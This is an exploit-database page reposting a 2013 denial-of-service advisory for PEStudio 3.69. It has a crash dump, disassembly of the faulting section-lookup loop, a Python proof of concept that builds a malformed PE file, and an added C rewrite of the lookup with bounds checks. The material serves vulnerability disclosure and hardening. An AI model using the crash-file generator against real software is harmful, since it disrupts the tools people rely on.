0day.today - Biggest Exploit Database in the World.
PEStudio 3.69 - Denial of Service
# Title: PEStudio Version 3.69 Denial of Service
# Date: 5th June 2013
# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
# Blog : http://www.debasish.in/
# Software Homepage: http://www.winitor.com/
# Version: PEStudio Version 3.69
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Recently released stable version (v6.91) is not affected.

'''
[+] Affected Module : peparser.dll version 3.69

[+] Crash Point:

(6b4.17c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=41414141 ecx=013f41d9 edx=013f0080 esi=00000000 edi=00004141
eip=3001ce70 esp=0012d15c ebp=00a26100 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Documents and Settings\debasish mandal\Desktop\Tools\PeStudio369\PeParser.dll -
PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
3001ce70 8b510c          mov     edx,dword ptr [ecx+0Ch] ds:0023:013f41e5=????????

0:000> u eip
PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
3001ce70 8b510c          mov     edx,dword ptr [ecx+0Ch]
3001ce73 3bda            cmp     ebx,edx
3001ce75 7209            jb      PeParser!PeParser::IPeParserFactory::Destroy+0xf1e0 (3001ce80)
3001ce77 8b6908          mov     ebp,dword ptr [ecx+8]
3001ce7a 03ea            add     ebp,edx
3001ce7c 3bdd            cmp     ebx,ebp
3001ce7e 720c            jb      PeParser!PeParser::IPeParserFactory::Destroy+0xf1ec (3001ce8c)
3001ce80 46              inc     esi

[+] IDA Pro Snap of the Buggy Function: (Code from peparser.dll version 3.69)

.text:3001CE40 sub_3001CE40    proc near               ; CODE XREF: sub_30003510+154p
.text:3001CE40                                         ; sub_300184D0+4Bp
.text:3001CE40                 mov     ecx, [ecx+4]
.text:3001CE43                 xor     eax, eax
.text:3001CE45                 test    ecx, ecx
.text:3001CE47                 jz      short locret_3001CE91
.text:3001CE49                 mov     edx, [ecx+1Ch]
.text:3001CE4C                 movzx   ecx, word ptr [edx+14h]
.text:3001CE50                 lea     ecx, [ecx+edx+18h]
.text:3001CE54                 test    ecx, ecx
.text:3001CE56                 jz      short locret_3001CE91
.text:3001CE58                 test    ebx, ebx
.text:3001CE5A                 jz      short locret_3001CE91
.text:3001CE5C                 push    esi
.text:3001CE5D                 push    edi
.text:3001CE5E                 movzx   edi, word ptr [edx+6]
.text:3001CE62                 xor     esi, esi
.text:3001CE64                 test    edi, edi
.text:3001CE66                 jle     short loc_3001CE8F
.text:3001CE68                 push    ebp
.text:3001CE69                 lea     esp, [esp+0]
.text:3001CE70
.text:3001CE70 loc_3001CE70:                           ; CODE XREF: sub_3001CE40+46j
.text:3001CE70                 mov     edx, [ecx+0Ch]  ; <-- Crash
.text:3001CE73                 cmp     ebx, edx
.text:3001CE75                 jb      short loc_3001CE80
.text:3001CE77                 mov     ebp, [ecx+8]
.text:3001CE7A                 add     ebp, edx
.text:3001CE7C                 cmp     ebx, ebp
.text:3001CE7E                 jb      short loc_3001CE8C
.text:3001CE80
.text:3001CE80 loc_3001CE80:                           ; CODE XREF: sub_3001CE40+35j
.text:3001CE80                 inc     esi
.text:3001CE81                 add     ecx, 28h
.text:3001CE84                 cmp     esi, edi
.text:3001CE86                 jl      short loc_3001CE70
.text:3001CE88                 pop     ebp
.text:3001CE89                 pop     edi
.text:3001CE8A                 pop     esi
.text:3001CE8B                 retn
.text:3001CE8C ; ---------------------------------------------------------------------------

[+] Proof of Concept :
'''

#!/usr/bin/python
# Builds POC.exe: a 365-byte file whose DOS header points e_lfanew (offset 0x3C)
# at 0x80, where only the two bytes "PE" are present. Every other byte is 'A',
# so the fields peparser.dll reads from the PE header (NumberOfSections at +6,
# SizeOfOptionalHeader at +0x14) come back as 0x4141, the value seen in edi at
# the crash. Byte literals keep the script working on both Python 2 and 3.
header  = b"MZ"                  # e_magic
header += b"A" * 58
header += b"\x80\x00\x00\x00"    # e_lfanew = 0x80
header += b"A" * 3
header += b"\x0e"
header += b"A" * 60
header += b"PE"                  # NT signature at 0x80, no trailing NUL bytes
header += b"A" * 235
f = open('POC.exe', 'wb')
f.write(header)
f.close()

# 0day.today [2024-09-28] #
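What the disassembly shows, read against the PE format: ecx is loaded from [edx+1Ch], a pointer to the NT headers; word [edx+14h] is IMAGE_FILE_HEADER.SizeOfOptionalHeader, so edx+18h plus that value is the first IMAGE_SECTION_HEADER; word [edx+6] is NumberOfSections. The loop then tests whether the RVA in ebx falls inside [VirtualAddress, VirtualAddress + VirtualSize) of each section, stepping 28h bytes per entry. Nothing checks that the section table lies inside the mapped file. In POC.exe both header fields are 'A' bytes, so NumberOfSections = SizeOfOptionalHeader = 0x4141 (edi=00004141), ecx lands at edx+0x4159 (013f0080 + 0x18 + 0x4141 = 013f41d9), and the read of [ecx+0Ch] at 013f41e5 is far past the end of a 365-byte file, hence the access violation. The following is an added example written for this page, not code from PEStudio or from the advisory's author: a C rewrite of that RVA-to-section lookup with the missing bounds checks, run over an in-memory copy of the PoC bytes, a constructed minimal PE32, and that same PE with the two header fields overwritten by 0x4141. The RVAs, the 512-byte buffers and the status codes are the example's own choices.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

enum pe_status { PE_OK = 0, PE_NOT_FOUND = 1, PE_BAD_DOS = -1, PE_BAD_NT = -2, PE_BAD_SECTION_TABLE = -3 };
#define FILE_HEADER_SIZE    0x14   /* sizeof(IMAGE_FILE_HEADER) */
#define SECTION_HEADER_SIZE 0x28   /* sizeof(IMAGE_SECTION_HEADER) */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }

/* Hardened counterpart of sub_3001CE40: find the section containing `rva`.
 * Every header-derived offset is checked against `len` before it is dereferenced.
 * On PE_OK *where is the section index; on PE_BAD_SECTION_TABLE it is the file offset
 * of the first section header, i.e. where the unchecked loop would have pointed ecx. */
int rva_to_section(const uint8_t *buf, size_t len, uint32_t rva, size_t *where)
{
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return PE_BAD_DOS;
    uint32_t e_lfanew = rd32(buf + 0x3C);
    if (e_lfanew > len || len - e_lfanew < 4 + FILE_HEADER_SIZE)
        return PE_BAD_NT;                        /* "PE\0\0" + file header must fit */
    const uint8_t *nt = buf + e_lfanew;          /* edx in the disassembly */
    if (memcmp(nt, "PE\0\0", 4) != 0)
        return PE_BAD_NT;
    uint16_t nsections = rd16(nt + 0x06);        /* word [edx+6]: NumberOfSections, edi at the crash */
    uint16_t opt_size  = rd16(nt + 0x14);        /* word [edx+14h]: SizeOfOptionalHeader */
    size_t sect_off = (size_t)e_lfanew + 4 + FILE_HEADER_SIZE + opt_size;  /* ecx = edx + 18h + opt_size */
    size_t table_bytes = (size_t)nsections * SECTION_HEADER_SIZE;
    if (sect_off > len || table_bytes > len - sect_off) {   /* the check PEStudio 3.69 lacked */
        if (where) *where = sect_off;
        return PE_BAD_SECTION_TABLE;
    }
    for (size_t i = 0; i < (size_t)nsections; i++) {
        const uint8_t *sh = buf + sect_off + i * SECTION_HEADER_SIZE;   /* add ecx, 28h */
        uint32_t vsize = rd32(sh + 0x08);        /* [ecx+8]   VirtualSize */
        uint32_t vaddr = rd32(sh + 0x0C);        /* [ecx+0Ch] VirtualAddress, the faulting read */
        if (rva >= vaddr && rva - vaddr < vsize) {   /* subtraction form cannot wrap like vaddr + vsize */
            if (where) *where = i;
            return PE_OK;
        }
    }
    return PE_NOT_FOUND;
}

/* The advisory's POC.exe rebuilt in memory (365 bytes): MZ, e_lfanew = 0x80, "PE" at 0x80,
 * every other byte 'A'. Constructed here from the Python PoC above. */
size_t build_poc(uint8_t *out, size_t cap)
{
    if (cap < 365) return 0;
    memset(out, 'A', 365);
    out[0] = 'M'; out[1] = 'Z';
    out[0x3C] = 0x80; out[0x3D] = out[0x3E] = out[0x3F] = 0;
    out[0x43] = 0x0E;
    out[0x80] = 'P'; out[0x81] = 'E';
    return 365;
}

/* Constructed minimal PE32 layout (416 bytes): one .text section at RVA 0x1000, size 0x1000. */
size_t build_valid_pe(uint8_t *out, size_t cap)
{
    const size_t opt = 0xE0;                     /* PE32 optional header size */
    const size_t n = 0x80 + 4 + FILE_HEADER_SIZE + opt + SECTION_HEADER_SIZE;
    if (cap < n) return 0;
    memset(out, 0, n);
    out[0] = 'M'; out[1] = 'Z'; out[0x3C] = 0x80;
    uint8_t *nt = out + 0x80;
    memcpy(nt, "PE\0\0", 4);
    nt[0x06] = 1;                                /* NumberOfSections */
    nt[0x14] = (uint8_t)opt;                     /* SizeOfOptionalHeader */
    nt[0x18] = 0x0B; nt[0x19] = 0x01;            /* Magic = PE32 */
    uint8_t *sh = nt + 4 + FILE_HEADER_SIZE + opt;
    memcpy(sh, ".text", 5);
    sh[0x09] = 0x10; sh[0x0D] = 0x10;            /* VirtualSize = VirtualAddress = 0x1000 */
    return n;
}

/* Scenarios as return values so they can be checked without a debugger. */
int poc_status(size_t *where) { uint8_t b[512]; return rva_to_section(b, build_poc(b, sizeof b), 0x41414141u, where); }
int valid_status(uint32_t rva, size_t *where) { uint8_t b[512]; return rva_to_section(b, build_valid_pe(b, sizeof b), rva, where); }
int tampered_status(size_t *where) {
    uint8_t b[512]; size_t n = build_valid_pe(b, sizeof b);
    b[0x86] = b[0x87] = b[0x94] = b[0x95] = 0x41;   /* NumberOfSections, SizeOfOptionalHeader := 0x4141 as in the dump */
    return rva_to_section(b, n, 0x1500, where);
}

int main(void)
{
    size_t w = 0;
    printf("POC.exe as-is:      status %d\n", poc_status(&w));
    printf("valid PE, RVA 1500: status %d (section %zu)\n", valid_status(0x1500, &w), w);
    int st = tampered_status(&w);
    printf("tampered header:    status %d, section table would start at file offset 0x%zx\n", st, w);
    return 0;
}
```

The raw PoC is rejected at the signature check because "PE" is followed by 'A' bytes rather than the two NUL bytes the format requires; the tampered copy passes that check and is rejected at the section-table bound instead, with the reported offset 0x41D9 matching ecx-edx in the crash dump plus e_lfanew. Any C99 compiler builds it as a single file.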